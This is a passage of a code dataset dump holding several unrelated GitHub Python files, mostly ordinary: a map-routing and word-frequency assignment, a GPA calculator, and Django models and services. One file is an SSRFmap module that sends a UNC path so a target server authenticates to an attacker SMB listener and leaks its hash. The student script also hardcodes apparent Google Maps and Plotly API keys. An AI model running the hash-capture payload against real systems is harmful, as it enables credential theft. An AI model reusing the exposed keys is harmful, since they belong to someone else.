101.6943028)\n# Tokyo(35.6828387, 139.7594549)\ngmap2.plot([3.1516636, 23.7593572, 35.6828387, 14.5906216, 4.8895453, -6.1753942, 3.1516636, 4.8895453],\n [101.6943028, 90.3788136, 139.7594549, 120.9799696, 114.9417574, 106.827183, 101.6943028, 114.9417574],\n 'cornflowerblue', edge_width=2.0)\ngmap2.plot([23.7593572, 31.2252985, 35.6828387], [90.3788136, 121.4890497, 139.7594549],\n 'cornflowerblue', edge_width=2.0)\ngmap2.plot([31.2252985, 14.5906216], [121.4890497, 120.9799696], 'cornflowerblue', edge_width=2.0)\ngmap2.plot([23.7593572, 4.8895453], [90.3788136, 114.9417574], 'cornflowerblue', edge_width=2.0)\n\ngmap2.apikey = \"AIzaSyDeRNMnZ__VnQDiATiuz4kPjF_c9r1kWe8\"\n\n# draw map into html\ngmap2.draw(\"maps/graph_before.html\")\nurl = r\"maps\\graph_before.html\"\nwebbrowser.open(url, new=2)\n\ngeolocator = Nominatim(user_agent='WIA2005_Assignment')\n\nfor current in range(len(locations)):\n for other in range(len(locations)):\n if current is not other:\n print(locations[current], '<->', locations[other])\n distance = d.distance(locations[current], locations[other])\n print('Distance: ' + str(distance) + 'km')\n print('\\n')\n\n\ngraph = Graph([\n (\"Kuala Lumpur\", \"Dhaka\", 2584.787), (\"Kuala Lumpur\", \"Jakarta\", 1178.665),\n (\"Kuala Lumpur\", \"Bandar Seri Begawan\", 1483.521), (\"Jakarta\", \"Bandar Seri Begawan\", 1519.996),\n (\"Dhaka\", \"Bandar Seri Begawan\", 3361.34), (\"Dhaka\", \"Shanghai\", 3171.866), (\"Dhaka\", \"Tokyo\", 4903.439),\n (\"Bandar Seri Begawan\", \"Manila\", 1260.663), (\"Manila\", \"Shanghai\", 1842.992), (\"Manila\", \"Tokyo\", 2995.407),\n (\"Shanghai\", \"Tokyo\", 1766.048)])\n\n# starting_point = input(\"From: \")\n# end_point = input(\"To: \")\n# shortest_route = list(graph.dijkstra(starting_point, end_point))\n# print(\"Shortest route from\", starting_point, \"to\", end_point)\n\nshortest_route = list(graph.dijkstra(\"Dhaka\", \"Manila\"))\n\nprint(\"Shortest route from Kuala Lumpur to Tokyo:\")\nfor i in shortest_route:\n if i is shortest_route[-1]:\n print(i, '\\n')\n else:\n print(i, \"--> \", end=\"\")\n\n\n##############################\n# Plot map for shortest path #\n##############################\ngmap3 = gmplot.GoogleMapPlotter(3.1516636, 101.6943028, 6)\n\nfor i in range(len(shortest_route) - 1):\n gmap3.plot([d.get_lat(shortest_route[i]), d.get_lat(shortest_route[i + 1])], [d.get_lon(shortest_route[i]),\n d.get_lon(shortest_route[i + 1])],\n 'cornflowerblue', edge_width=2.0)\n\ngmap3.apikey = \"AIzaSyDeRNMnZ__VnQDiATiuz4kPjF_c9r1kWe8\"\ngmap3.draw(\"maps/graph_after.html\")\n\nurl = r\"maps\\graph_after.html\"\nwebbrowser.open(url, new=2)\n\n# initializing stop words\nstopwords = ['a', 'about', 'above', 'after', 'again', 'against', 'all', 'am', 'an', 'and',\n 'any', 'are', \"aren't\", 'as', 'at', 'be', 'because', 'been', 'before', 'being',\n 'below', 'between', 'both', 'but', 'by', \"can't\", 'cannot', 'could', \"couldn't\", 'did',\n \"didn't\", 'do', 'does', \"doesn't\", 'doing', \"don't\", 'down', 'during', 'each', 'few',\n 'for', 'from', 'further', 'had', \"hadn't\", 'has', \"hasn't\", 'have', \"haven't\", 'having',\n 'he', \"he'd\", \"he'll\", \"he's\", 'her', 'here', \"here's\", 'hers', 'herself', 'him',\n 'himself', 'his', 'how', \"how's\", 'i', \"i'd\", \"i'll\", \"i'm\", \"i've\", 'if', 'in', 'into',\n 'is', \"isn't\", 'it', \"it's\", 'its', 'itself', \"let's\", 'me', 'more', 'most', \"mustn't\",\n 'my', 'myself', 'no', 'nor', 'not', 'of', 'off', 'on', 'once', 'only', 'or', 'other',\n 'ought', 'our', 'ours', 'ourselves', 'out', 'over', 'own', 'same', \"shan't\", 'she', \"she'd\",\n \"she'll\", \"she's\", 'should', \"shouldn't\", 'so', 'some', 'such', 'than', 'that', \"that's\",\n 'the', 'their', 'theirs', 'them', 'themselves', 'then', 'there', \"there's\", 'these', 'they',\n \"they'd\", \"they'll\", \"they're\", \"they've\", 'this', 'those', 'through', 'to', 'too', 'under',\n 'until', 'up', 'very', 'was', \"wasn't\", 'we', \"we'd\", \"we'll\", \"we're\", \"we've\", 'were', \"weren't\",\n 'what', \"what's\", 'when', \"when's\", 'where', \"where's\", 'which', 'while', 'who', \"who's\", 'whom', 'why',\n \"why's\", 'with', \"won't\", 'would', \"wouldn't\", 'you', \"you'd\", \"you'll\", \"you're\", \"you've\",\n 'your', 'yours', 'yourself', 'yourselves']\n\nklIO = open('news/text/Kuala Lumpur.txt', 'r', encoding='utf-8-sig')\nkl_text = klIO.read().lower()\nkl_text = kl_text.replace(\"\\n\", \" \")\nklIO.close()\n\njakartaIO = open('news/text/Jakarta.txt', 'r', encoding='utf-8-sig')\njakarta_text = jakartaIO.read().lower()\nkl_text = kl_text.replace(\"\\n\", \" \")\njakartaIO.close()\n\nmanilaIO = open('news/text/Manila.txt', 'r', encoding='utf-8-sig')\nmanila_text = manilaIO.read().lower()\nkl_text = kl_text.replace(\"\\n\", \" \")\nmanilaIO.close()\n\ndhakaIO = open('news/text/Dhaka.txt', 'r', encoding='utf-8-sig')\ndhaka_text = dhakaIO.read().lower()\ndhaka_text = dhaka_text.replace(\"\\n\", \" \")\ndhakaIO.close()\n\nbandar_seri_begawanIO = open('news/text/Bandar Seri Begawan.txt', 'r', encoding='utf-8-sig')\nbandar_seri_begawan_text = bandar_seri_begawanIO.read().lower()\nbandar_seri_begawan_text = bandar_seri_begawan_text.replace(\"\\n\", \" \")\nbandar_seri_begawanIO.close()\n\nshanghaiIO = open('news/text/Shanghai.txt', 'r', encoding='utf-8-sig')\nshanghai_text = shanghaiIO.read().lower()\nshanghai_text = shanghai_text.replace(\"\\n\", \" \")\nshanghaiIO.close()\n\ntokyoIO = open('news/text/Tokyo.txt', 'r', encoding='utf-8-sig')\ntokyo_text = tokyoIO.read().lower()\ntokyo_text = tokyo_text.replace(\"\\n\", \" \")\ntokyoIO.close()\n\n\n# get frequency of words in a text\ndef frequency(text, city):\n list_of_words = text.split()\n freq = {}\n for word in list_of_words:\n freq[word] = freq.get(word, 0) + 1\n keys = freq.keys()\n\n print(\"Frequencies of word for \" + city + \"'s article:\\n\\n\" + str(freq) + \"\\n\")\n\n\n# print frequency of each word in text for every cities' article\nfrequency(kl_text, 'Kuala Lumpur')\nfrequency(dhaka_text, 'Dhaka')\nfrequency(jakarta_text, 'Jakarta')\nfrequency(bandar_seri_begawan_text, 'Bandar Seri Begawan')\nfrequency(manila_text, 'Manila')\nfrequency(shanghai_text, 'Shanghai')\nfrequency(tokyo_text, 'Tokyo')\n\n\ndef word_count(text):\n stop_count = 0\n list_of_words = text.split()\n for word in stopwords:\n if RabinKarp.rabin_karp_matcher(word, text):\n stop_count = stop_count + 1\n # delete stop words\n text = text.lower().replace(word, \"\", 1)\n return stop_count, len(list_of_words)\n\n\nkl_stop_count, kl_total_words = word_count(kl_text)\ndhaka_stop_count, dhaka_total_words = word_count(dhaka_text)\njakarta_stop_count, jakarta_total_words = word_count(jakarta_text)\nbsb_stop_count, bsb_total_words = word_count(bandar_seri_begawan_text)\nmanila_stop_count, manila_total_words = word_count(manila_text)\nshanghai_stop_count, shanghai_total_words = word_count(shanghai_text)\ntokyo_stop_count, tokyo_total_words = word_count(tokyo_text)\n\n# Histogram\npy.sign_in(username='DanialHarith', api_key='NyqKPpTtwYfr4nyZwcYP')\n\nx = [\"Kuala Lumpur\", \"Dhaka\", \"Jakarta\", \"Bandar Seri Begawan\", \"Manila\", \"Shanghai\", \"Tokyo\"]\nstop_counts = [kl_stop_count, dhaka_stop_count, jakarta_stop_count, bsb_stop_count,\n manila_stop_count, shanghai_stop_count, tokyo_stop_count]\ntotal_words = [kl_total_words, dhaka_total_words, jakarta_total_words, bsb_total_words,\n manila_total_words, shanghai_total_words, tokyo_total_words]\n\ndata = [\n go.Histogram(\n histfunc=\"sum\",\n y=stop_counts,\n x=x,\n name=\"Stop words\"\n ),\n go.Histogram(\n histfunc=\"sum\",\n y=total_words,\n x=x,\n name=\"Total words\"\n )\n]\nlayout = go.Layout(\n title=go.layout.Title(\n text=\"Stop Words & Total Words\",\n xref='paper',\n x=0\n )\n)\nfig = go.Figure(data=data, layout=layout)\npy.plot(fig, filename='Stop Words Count')\n\n########################################################################\n# Get the total distribution taken of random routes taken for end user #\n########################################################################\na = d.distance(\"Kuala Lumpur\", \"Manila\")\n\nb = d.distance(\"Kuala Lumpur\", \"Jakarta\")\n\nc = d.distance(\"Kuala Lumpur\", \"Dhaka\")\n\nTotalDist = a + b + c\n\ndistKL_to_Manila = a / TotalDist\n\ndistKL_to_Jakarta = b / TotalDist\n\ndistKL_to_Dhaka = c / TotalDist\n\nprint(\"\\nProbability Distribution for KL to Manila = \", distKL_to_Manila,\n \"\\nProbability Distribution for KL to Jakarta = \", distKL_to_Jakarta,\n \"\\nProbability Distribution for KL to Dhaka = \", distKL_to_Dhaka,)\n\n\nend = time.time() - start\nprint(\"\\nTotal running time:\", end, \"s\")\n","repo_name":"DanialAroff/ALGO-Project","sub_path":"FINAL1.py","file_name":"FINAL1.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"22118247598","text":"class Calculator:\n\n def __init__(self, dataInterface, dataWrapper):\n self.dataInterface = dataInterface\n self.dataWrapper = dataWrapper\n\n\n def calculateCumulativeGpa(self, undergrad):\n score = 0\n units = 0\n for term in undergrad.pastTerms:\n score += self.countTermScore(term)\n units += self.countTermUnits(term, True)\n\n return score / units\n\n\n def calculateTermGpa(self, term):\n score = self.countTermScore(term)\n units = self.countTermUnits(term, True)\n\n return score / units\n\n\n def countTermScore(self, term):\n scoreCount = 0\n for course in term.courses:\n try:\n scoreCount += course.units * self.dataWrapper.getValueFromLetterGrade(course.letterGrade)\n except TypeError:\n continue\n\n return scoreCount\n\n\n def countTermUnits(self, term, gradedOnly=False):\n unitCount = 0\n for course in term.courses:\n if course.letterGrade == 'LW' or (gradedOnly and course.letterGrade == 'P'):\n continue\n\n unitCount += course.units\n\n return unitCount\n","repo_name":"joshtgill/lej","sub_path":"src/academics/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37774327357","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 8 13:42:13 2021\r\n\r\n@author: ja\r\n\"\"\"\r\n\r\ns = input(\"Write a word:\")\r\n\r\nx = 0\r\nn = 0\r\n\r\nfor i in range(len(s)-2):\r\n if s[i] == 'b':\r\n if s[i+1] == 'o':\r\n if s[i+2] == 'b':\r\n x += 1\r\n n += 1\r\n \r\nprint (\"Number of times bob occurs is:\", x)","repo_name":"Krystep/MITx-6.00.1x","sub_path":"bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17883256742","text":"from time import time\nfrom os.path import curdir\nfrom clones.validation.arguments import RunArguments\nfrom clones.validation.batch import BatchBenchmark\n\n\n# ======================== PARSE SCRIPT ARGUMENTS =============================\n\nargs = RunArguments(description='Batch benchmark arguments.')\njob_path = args['path']\ntrain = args['train_globally']\n\n# ============================= RUN SCRIPT ====================================\n\nstart_time = time()\n\n\n# run each simulation in job file\nwith open(job_path, 'r') as job_file:\n\n # run each simulation\n for path in job_file.readlines():\n\n path = path.strip()\n\n # load benchmark\n benchmark = BatchBenchmark.load(path)\n benchmark.batch.root = curdir\n\n # evaluate benchmark\n benchmark.run(train=train)\n\n # save benchmark\n benchmark.save(path)\n\n# print runtime to standard out\nruntime = time() - start_time\nprint('BATCH COMPLETED IN {:0.2f}.\\n'.format(runtime))\n","repo_name":"sbernasek/flyqma","sub_path":"flyqma/scripts/run_batch.py","file_name":"run_batch.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"33717793794","text":"import sys\r\ndef leap_year(x):\r\n if (x%4) == 0 and (x%100) != 0 or (x%400) == 0 :\r\n print('1')\r\n else :\r\n print('0')\r\n\r\na = int(sys.stdin.readline())\r\nleap_year(a)\r\n# or로 묶을 때 괄호처리를 해줘야하는지","repo_name":"jjin93/Pyton_algorithm","sub_path":"week01/진승현/코드 리뷰용/2753.py","file_name":"2753.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"127965603","text":"import bisect\n\nL, Q = list(map(int, input().split()))\narr = [0, L]\nfor q in range(Q):\n c, x = list(map(int, input().split()))\n if c == 1:\n #bisect.insort_left(arr, x)\n ind = bisect.bisect_left(arr, x)\n arr.insert(ind, x)\n else:\n index = bisect.bisect_left(arr, x)\n diff = arr[index]-arr[index-1]\n print(diff)\n\n\n\n","repo_name":"tinaba96/coding","sub_path":"acode/abc217/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72243172443","text":"from product.serializers import (\n ProductSerializer,\n PriceSerializer,\n)\n\nfrom product.models import (\n Product as ProductModel,\n Price as PriceModel,\n)\n\n\n\ndef get_product(product_id):\n \"\"\"상품 정보 반환 함수\n\n Args:\n product_id (int): 상품 아이디\n\n Returns:\n product_info (dict): 상품 정보\n \"\"\"\n\n product_obj = ProductModel.objects.get(id=product_id)\n\n product_info = ProductSerializer(product_obj).data\n\n return product_info\n\n\ndef create_product(product_info):\n \"\"\"상품 정보로 상품 생성하는 함수\n\n Args:\n product_info (dict): 생성할 상품 정보 \n\n Returns:\n product_obj (ProductModel) : 생성된 상품 오브젝트\n\n\n \"\"\"\n\n product_serializer = ProductSerializer(data=product_info)\n product_serializer.is_valid(raise_exception=True)\n product_obj = product_serializer.save()\n\n return product_obj\n\n\ndef update_product(product_id, update_info):\n \"\"\"상품 정보 수정 함수\n \n Args:\n product_id (int): 수정할 상품 PK\n update_info (dict): 수정 정보 \n\n Returns:\n product_obj (ProductModel): 수정된 상품 오브젝트\n\n Raises:\n \n \"\"\"\n product_obj = ProductModel.objects.get(id=product_id)\n\n product_serializer = ProductSerializer(product_obj, data=update_info, partial=True)\n product_serializer.is_valid(raise_exception=True)\n product_obj = product_serializer.save()\n\n return product_obj\n\n\ndef delete_product(product_id):\n \"\"\"상품 삭제 기능 함수 \n\n Args:\n product_id (int): 삭제할 상품 PK\n\n Returns:\n \n \n \"\"\"\n\n product_obj = ProductModel.objects.get(id=product_id)\n product_obj.delete()\n\n\ndef get_price_list(product_id):\n \"\"\" 가격 정보 리스트 반환 함수\n\n Args:\n product_id (int): 상품 PK\n\n Returns:\n price_info_list (list): 가격 정보 리스트\n \"\"\"\n\n product_obj = ProductModel.objects.get(id=product_id)\n\n price_obj_list = PriceModel.objects.filter(product=product_obj)\n \n price_info_list = PriceSerializer(price_obj_list, many=True).data\n\n return price_info_list\n\n\ndef create_price(product_id, price_info):\n \"\"\"상품에 대한 가격 생성 함수\n\n Args:\n product_id (int): 상품 PK\n price_info (dict): 가격 정보\n\n Returns:\n price_obj (PriceModel): 생성한 가격 오브젝트\n \"\"\"\n\n price_info['product'] = product_id\n price_serializer = PriceSerializer(data=price_info)\n price_serializer.is_valid(raise_exception=True)\n price_obj = price_serializer.save()\n\n return price_obj\n\n\ndef update_price(price_id, update_info):\n \"\"\"가격 정보 수정 함수\n \n Args:\n price_id (int): 수정할 가격 PK\n update_info (dict): 수정 정보 \n\n Returns:\n price (PriceModel): 수정된 가격 오브젝트\n\n Raises:\n \n \"\"\"\n price_obj = PriceModel.objects.get(id=price_id)\n\n price_serializer = PriceSerializer(price_obj, data=update_info, partial=True)\n price_serializer.is_valid(raise_exception=True)\n price_obj = price_serializer.save()\n\n return price_obj \n\n\ndef delete_price(price_id):\n \"\"\"가격 삭제 기능 함수 \n\n Args:\n price_id (int): 삭제할 가격 PK\n\n Returns:\n \n \n \"\"\"\n\n price_obj = PriceModel.objects.get(id=price_id)\n price_obj.delete()\n","repo_name":"kimphysicsman/fruites_store_service","sub_path":"product/servieces/product_service.py","file_name":"product_service.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27939568993","text":"import cv2\nimport matplotlib.pyplot as plt\nfrom skimage import exposure\n\nimg = cv2.imread(\"../Images/carro.jpg\", 0)\n\n# Histograma original\nplt.figure()\nplt.title(\"Hist original\")\nplt.hist(img.ravel(), 256, [0, 256])\n\n# Apresentar img original\nplt.figure()\nplt.title(\"Figura original\")\nplt.imshow(img, \"gray\")\nprint(f\"Shape da img original: {img.shape}\")\n\n# Value 'gain = 1.9'\nimg_adjust = exposure.adjust_log(img, 1.9)\n# Apresentar imagem alterada\nplt.figure()\nplt.title(\"Imagem Ajustada com skimage\")\nplt.imshow(img_adjust, \"gray\")\n\nplt.figure()\nplt.hist(img_adjust.ravel(), 256, [0, 256])\nplt.title(\"Histograma da Imagem Ajustada com skimage\")\n\n# Criar mascara\n# for l in range(0, 95):\n# for c in range(10, 30):\n# pto = (c, l)\n# img_ex1[pto] = 100\n\nplt.show()\n","repo_name":"brunosilva5/PDI-UTAD","sub_path":"Folha de Exercicios/MiniTeste1/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26169460225","text":"from django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom core.models import CategoryCampaing\n\n\nclass Command(BaseCommand):\n help = 'create currencies'\n\n def success(self, message):\n return self.stdout.write(\n self.style.SUCCESS(message)\n )\n\n def warning(self, warning):\n return self.stdout.write(\n self.style.WARNING(warning)\n )\n\n def error(self, error):\n return self.stdout.write(\n self.style.ERROR(error)\n )\n\n def handle(self, *args, **options):\n self.warning(\n 'if something goes wrong after fixtures installations,\\\n please use: python manage.py flush.'\n )\n\n with transaction.atomic():\n \"\"\"create currencies\"\"\"\n currency_one = CategoryCampaing.objects.create(\n name='Art',\n slug='art'\n )\n currency_two = CategoryCampaing.objects.create(\n name='Technology',\n slug='techonogy'\n )\n self.success('categories created.')\n","repo_name":"ngelrojas/cotizate-back","sub_path":"apiuser/core/management/commands/dbcategories.py","file_name":"dbcategories.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27234283277","text":"from pathlib import Path\nfrom banal import as_bool\nfrom normality import slugify\nfrom datetime import datetime\nfrom typing import Dict, Optional, Any\nfrom nomenklatura.dataset import Dataset as NKDataset\nfrom nomenklatura.dataset import DataCatalog\nfrom nomenklatura.dataset.util import type_check, type_require\nfrom nomenklatura.util import iso_to_version, datetime_iso\nfrom followthemoney.types import registry\nfrom followthemoney.namespace import Namespace\n\nfrom yente.logs import get_logger\n\nlog = get_logger(__name__)\nBOOT_TIME = datetime_iso(datetime.utcnow())\n\n\nclass Dataset(NKDataset):\n def __init__(self, catalog: DataCatalog[\"Dataset\"], data: Dict[str, Any]):\n name = data[\"name\"]\n norm_name = slugify(name, sep=\"_\")\n if name != norm_name:\n raise ValueError(\"Invalid dataset name %r (try: %r)\" % (name, norm_name))\n super().__init__(catalog, data)\n\n if self.version is None:\n ts = data.get(\"last_export\", BOOT_TIME)\n self.version = iso_to_version(ts) or \"static\"\n\n self.load = as_bool(data.get(\"load\"), True)\n self.entities_url = self._get_entities_url(data)\n namespace = as_bool(data.get(\"namespace\"), False)\n self.ns = Namespace(self.name) if namespace else None\n\n def _get_entities_url(self, data: Dict[str, Any]) -> Optional[str]:\n if \"entities_url\" in data:\n return type_require(registry.url, data.get(\"entities_url\"))\n path = type_check(registry.string, data.get(\"path\"))\n if path is not None:\n return Path(path).resolve().as_uri()\n resource_name = type_check(registry.string, data.get(\"resource_name\"))\n resource_type = type_check(registry.string, data.get(\"resource_type\"))\n for resource in self.resources:\n if resource.url is None:\n continue\n if resource_name is not None and resource.name == resource_name:\n return resource.url\n if resource_type is not None and resource.mime_type == resource_type:\n return resource.url\n return None\n\n def to_dict(self) -> Dict[str, Any]:\n data = super().to_dict()\n data[\"load\"] = self.load\n data[\"entities_url\"] = self.entities_url\n data[\"namespace\"] = self.ns is not None\n if \"children\" not in data:\n data[\"children\"] = [c.name for c in self.children]\n return data\n","repo_name":"opensanctions/yente","sub_path":"yente/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"86"} +{"seq_id":"14438526186","text":"from core.utils import *\nimport logging\n\n# NOTE\n# Use auxiliary/server/capture/smb from Metasploit to setup a listener\n\nname = \"smbhash\"\ndescription = \"Force an SMB authentication attempt by embedding a UNC path (\\\\SERVER\\SHARE) \"\nauthor = \"Swissky\"\ndocumentation = []\n\nclass exploit():\n UNC_EXAMPLE = \"\\\\\\\\192.168.1.2\\\\SSRFmap\"\n UNC_IP = \"192.168.1.2\"\n UNC_FILE = \"SSRFmap\"\n\n def __init__(self, requester, args):\n logging.info(f\"Module '{name}' launched !\")\n\n UNC_IP = input(\"UNC IP (default: 192.168.1.2): \")\n if UNC_IP != '':\n self.UNC_IP = UNC_IP\n\n UNC_FILE = input(\"UNC File (default: SSRFmap): \")\n if UNC_FILE != '':\n self.UNC_FILE = UNC_FILE\n \n payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)\n r = requester.do_request(args.param, payload)\n logging.info(f\"\\033[32mSending UNC Path\\033[0m : {payload}\")\n","repo_name":"swisskyrepo/SSRFmap","sub_path":"modules/smbhash.py","file_name":"smbhash.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":2531,"dataset":"github-code","pt":"86"} +{"seq_id":"1355294242","text":"from uuid import uuid4\nimport os\nfrom django.core.validators import RegexValidator\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\nCATEGORY = [\n (u'0', u'House'),\n (u'1', u'Apartment'),\n (u'2', u'Duplex'),\n (u'3', u'Villa'),\n]\n\nCITY = [\n (u\"1\", \"Tehran\"),\n]\n\nURBANAREANUMBER = [\n (u'1', u'1'),\n (u'2', u'2'),\n (u'3', u'3'),\n (u'4', u'4'),\n (u'5', u'5'),\n (u'6', u'6'),\n (u'7', u'7'),\n (u'8', u'8'),\n (u'9', u'9'),\n (u'10', u'10'),\n (u'11', u'11'),\n (u'12', u'12'),\n (u'13', u'13'),\n (u'14', u'14'),\n (u'15', u'15'),\n (u'16', u'16'),\n (u'17', u'17'),\n (u'18', u'18'),\n (u'19', u'19'),\n (u'20', u'20'),\n (u'21', u'21'),\n (u'22', u'22'),\n]\n\nGENERAL = u\"0\"\nDESIRED = u\"1\"\nPOWER = [\n (GENERAL, u\"general\"),\n (DESIRED, u\"desired\"),\n]\n\nPOPULARITY = [\n (u\"1\", u\"1\"),\n (u\"2\", u\"2\"),\n (u\"3\", u\"3\"),\n (u\"4\", u\"4\"),\n (u\"5\", u\"5\"),\n]\n\nphone_regex = RegexValidator(\n regex=r'^\\+?1?\\d{9,15}$',\n message=\"Phone number must be entered in the format: '09226255415'. Up to 15 digits allowed.\"\n)\n\n\ndef get_image_path(instance, filename):\n id = uuid4()\n return os.path.join('Images', str(id), filename)\n\n\nclass Agencies(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, blank=True,null=True)\n special = models.BooleanField(\n default=False,\n verbose_name='کاربر ویژه',\n )\n skill = models.CharField(\n max_length=100,\n verbose_name = \"حوزه فعالیت\",\n blank=True,\n null=True,\n )\n urban_area_number = models.CharField(\n max_length=2,\n choices=URBANAREANUMBER,\n verbose_name='شماره منطقه',\n )\n address = models.CharField(\n max_length=300,\n verbose_name=\"ادرس\",\n )\n city = models.CharField(\n max_length=1,\n choices=CITY,\n verbose_name=\"شهر\",\n )\n popularity = models.CharField(\n max_length=1,\n choices=POPULARITY,\n verbose_name=\"محبوبیت\",\n default=u\"5\",\n )\n created = models.DateTimeField(\n auto_now_add=True,\n verbose_name=\"تاریخ ساخت اکانت\",\n )\n updated = models.DateTimeField(\n auto_now=True,\n verbose_name=\"اخرین به روز رسانی\",\n )\n phone_number = models.CharField(\n validators=[phone_regex],\n max_length=17,\n blank=True,\n null=True,\n unique=True,\n verbose_name=\"شماره موبایل\",\n )\n code_number = models.CharField(\n max_length=100,\n verbose_name = \"شناسه صنفی \",\n blank=True,\n null=True,\n )\n web_site = models.URLField(\n verbose_name=\"وب سایت\",\n blank=True,\n null=True,\n )\n instagram = models.URLField(\n verbose_name=\"ادرس اینستاگرام\",\n blank=True,\n null=True,\n )\n about_me = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n verbose_name=\"معرفی\",\n )\n long_description = models.CharField(\n max_length=1000,\n blank=True,\n null=True,\n verbose_name=\"معرفی جامع\",\n )\n image = models.ImageField(\n upload_to=get_image_path,\n blank=True,\n null=True,\n verbose_name=\"تصویر آژانس\",\n )\n image_owner = models.ImageField(\n upload_to=get_image_path,\n blank=True,\n null=True,\n verbose_name=\"تصویر مدیران و همکاران\",\n )\n agencies = models.BooleanField(\n default=False,\n )\n\n\n def __str__(self):\n return self.user.username\n\n\n@receiver(post_save, sender=User)\ndef update_agencies_profile(sender, instance, created, **kwargs):\n if created:\n Agencies.objects.create(user=instance)\n instance.agencies.save()\n","repo_name":"pd-Shah/realestate","sub_path":"agencies/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"32754082577","text":"\"\"\"\nATask Manager\n\"\"\"\n\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass RegisteringTwice(AttributeError):\n \"\"\"Error registering the same name twice\"\"\"\n pass\n\n\nclass RegistryItem(object):\n \"\"\"Item of the registry\"\"\"\n def __init__(self, **options):\n \"\"\"Copies all options to it's own instance dict\"\"\"\n self.__dict__ = {\n **options\n }\n\n def update(self, other):\n \"\"\"Equal to dict method\"\"\"\n self.__dict__.update(other.__dict__)\n\n def __eq__(self, other):\n \"\"\"Equal to dict method\"\"\"\n if other is None:\n return False\n if isinstance(other, dict):\n return self.__dict__ == other\n return self.__dict__ == other.__dict__\n\n\nclass Manager(object):\n \"\"\"The registry manager\"\"\"\n\n def __init__(self, name, unite=True):\n \"\"\"\n Constructor\n\n :param namespace: name of the registry namespace\n :type namespace: str\n :param unite: unite registered items with the same name.\n If unite=False, raises RegisteringTwice when\n using the same name.\n \"\"\"\n self._name = name\n self._unite = unite\n self._registry = {}\n\n def register(self, name, **options):\n \"\"\"\n Register an item\n\n :param name: name of the item\n :type name: str\n :param options: options to register\n :type options: dict\n \"\"\"\n item = RegistryItem(**options)\n old = self._registry.get(name, None)\n if old:\n if self._unite:\n old.update(item)\n return\n raise RegisteringTwice(\"Registering twice in %s: %s\" % (self._name, name))\n self._registry[name] = item\n\n def unregister(self, name):\n \"\"\"\n Unregister the item\n\n :param name: name of the item\n :type name: str\n \"\"\"\n logger.debug('unregistering from %s: %s', self._name, name)\n del self._registry[name]\n\n def get(self, name):\n \"\"\"\n Get a register item by name\n\n :param name: name of the item\n :type name: str\n :returns: Item of the registry or default value\n :rtype: RegistryItem\n \"\"\"\n ret = self._registry.get(name, None)\n if not ret and self._unite:\n ret = RegistryItem()\n self._registry[name] = ret\n return ret\n","repo_name":"nnseva/atasks","sub_path":"atasks/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15551884966","text":"import os\npath=input(\"enter the path to list the directories and files: \")\nfod=os.listdir(path)\nfor each in fod:\n \n x=(os.path.join(path,each))\n if os.path.isfile(x):\n print(f\"{x} is a file\")\n else:\n print(f\"{x} is a directory\")\n \n","repo_name":"tarakrrr/cloudops","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73080706523","text":"# STL\nfrom typing import Tuple, Union, Generator\nfrom datetime import datetime, timedelta\n\n# PDM\nfrom croniter import croniter\nfrom dateutil.tz import gettz, tzstr, tzfile, tzlocal\nfrom pytimeparse import parse as timeparse\n\n# LOCAL\nfrom tenpo.log_utils import getLogger\n\nValidTZ = tzlocal | tzfile | tzstr\n\nLOG = getLogger()\n\n\nclass InvalidEventTimer(Exception):\n def __init__(self, *args: object) -> None:\n super().__init__(*args)\n\n\nclass InvalidCron(InvalidEventTimer):\n def __init__(self, cron: str) -> None:\n super().__init__(\"open tenpo li pakala: `%s`\" % cron)\n\n\nclass InvalidTZ(InvalidEventTimer):\n def __init__(self, timezone: str) -> None:\n super().__init__(\"nasin tenpo li pakala: `%s`\" % timezone)\n\n\nclass InvalidDelta(InvalidEventTimer):\n def __init__(self, delta: str) -> None:\n super().__init__(\"suli tenpo li pakala: `%s`\" % delta)\n\n\nclass EventTimer:\n __tz: ValidTZ\n __cron: croniter\n __delta: timedelta\n\n def __init__(self, 